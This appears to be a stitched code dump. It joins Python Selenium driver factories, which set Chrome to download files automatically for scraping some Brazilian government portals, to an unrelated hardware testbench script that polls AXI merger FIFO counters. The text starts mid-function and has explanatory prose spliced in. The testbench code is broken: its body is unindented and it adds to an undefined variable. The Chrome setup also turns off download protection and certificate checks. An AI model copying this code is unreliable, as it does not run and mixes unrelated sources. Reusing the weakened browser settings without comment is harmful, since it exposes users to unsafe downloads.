"plugins.always_open_pdf_externally": True,
downloads PDFs automatically
"""
print('\033[1;33m Headless\033[m')
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
# profile chrome_options.add_argument("user-data-dir=C:\\Users\\AtechM_03\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": True,
'download.extensions_to_open': 'xml',
"plugins.always_open_pdf_externally": True,
# the option above downloads PDFs automatically
'profile.default_content_setting_values.automatic_downloads': 1,
})
# options.add_argument("disable-infobars")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--safebrowsing-disable-download-protection")
chrome_options.add_argument("safebrowsing-disable-extension-blacklist")
# #################### Difference from above --> safe_browsing enabled
chromedriver = link
real_path_for_chromedriver()
# chdir
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
os.chdir(volta)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
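The prefs above suppress Chrome's download prompt, so the caller's loop has nothing to block on while a file lands in `path`. A minimal polling sketch follows; `wait_for_downloads` and its timeout are assumptions for illustration, not part of this module. It relies on the fact that Chrome keeps an in-progress download as a `*.crdownload` file and renames it when the transfer completes.

```python
import os
import time


def wait_for_downloads(path, timeout=60):
    """Block until no *.crdownload file remains in `path` (assumed helper).

    Chrome writes an in-progress download as <name>.crdownload and renames
    it on completion, so "no matches" means every download has finished.
    Returns True on completion, False if `timeout` seconds elapse first.
    """
    deadline = time.time() + timeout
    while time.time() < deadline:
        if not any(f.endswith('.crdownload') for f in os.listdir(path)):
            return True
        time.sleep(0.5)
    return False
```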


def proffile_noqr_driver(path='', profile_path=''):
    """
    # Used for DEFIS
    # Driver that stores a profile and takes a download path
    :param path: download directory (defaults to the current path)
    :param profile_path: path to the Chrome profile
    :return: the driver.
    """
    __padrao = profile_path
    path = path.replace('/', '\\')
    # the try is already handled inside replace
    chrome_options = Options()
    # chrome_options.add_argument("--headless")
    chrome_options.add_argument("--disable-notifications")
    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--verbose')
    chrome_options.add_argument(f"user-data-dir={__padrao}")
    # loads the default profile with the qr_code
    chrome_options.add_argument('--ignore-certificate-errors')
    chrome_options.add_experimental_option("prefs", {
        "download.default_directory": path,
        "download.prompt_for_download": False,
        "download.directory_upgrade": True,
        "safebrowsing_for_trusted_sources_enabled": False,
        "safebrowsing.enabled": True,
        "plugins.always_open_pdf_externally": True,
        'profile.default_content_setting_values.automatic_downloads': 1,
    })
    chromedriver = link
    real_path_for_chromedriver()
    # carried over from ginfess_driver [magic]
    driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
    # self.tags_wait('body', 'input', 'div')
    # sleep(5)
    return driver


def jucesp_simple_driver():
    """
    # Plain driver for JUCESP: no stored profile and no custom download path
    :return: the driver.
    """
    # __padrao = profile_path
    chrome_options = Options()
    # chrome_options.add_argument("--headless")
    chrome_options.add_argument("--disable-notifications")
    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--verbose')
    # chrome_options.add_argument(f"user-data-dir={__padrao}")
    # would load the default profile with the qr_code
    chrome_options.add_argument('--ignore-certificate-errors')
    chrome_options.add_experimental_option("prefs", {
        "download.prompt_for_download": False,
        "download.directory_upgrade": True,
        "safebrowsing_for_trusted_sources_enabled": False,
        "safebrowsing.enabled": True,
        "plugins.always_open_pdf_externally": True,
        'profile.default_content_setting_values.automatic_downloads': 1,
    })
    chromedriver = link
    real_path_for_chromedriver()
    # carried over from ginfess_driver [magic]
    driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
    # self.tags_wait('body', 'input', 'div')
    # sleep(5)
    return driver
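All four factories above rebuild nearly the same experimental prefs dict by hand. One way to de-duplicate them is a small builder like the hypothetical `build_prefs` below; the name and defaults are assumptions, not part of this module.

```python
def build_prefs(path='', open_pdf_externally=True, safe_browsing=True):
    """Build the Chrome download prefs shared by the driver factories above
    (hypothetical refactoring helper)."""
    prefs = {
        "download.prompt_for_download": False,
        "download.directory_upgrade": True,
        "safebrowsing_for_trusted_sources_enabled": False,
        "safebrowsing.enabled": safe_browsing,
        "plugins.always_open_pdf_externally": open_pdf_externally,
        "profile.default_content_setting_values.automatic_downloads": 1,
    }
    if path:  # jucesp_simple_driver sets no download directory at all
        prefs["download.default_directory"] = path
    return prefs
```

Each factory would then call `chrome_options.add_experimental_option("prefs", build_prefs(path))` and tweak only the flags that differ.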


# axi_noc/tbx16/counts.py -- from the vlsistuff repo (MIT license)
import logs
import veri


def monitorStuff(Net):
    Val = logs.peek(Net)
    if Val != 0:
        logs.log_error('PANIC activated on %s %s' % (Net, veri.peek(Net)))
        return 1
    return 0
def monitorStuffs():
panics=0
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_dcount")
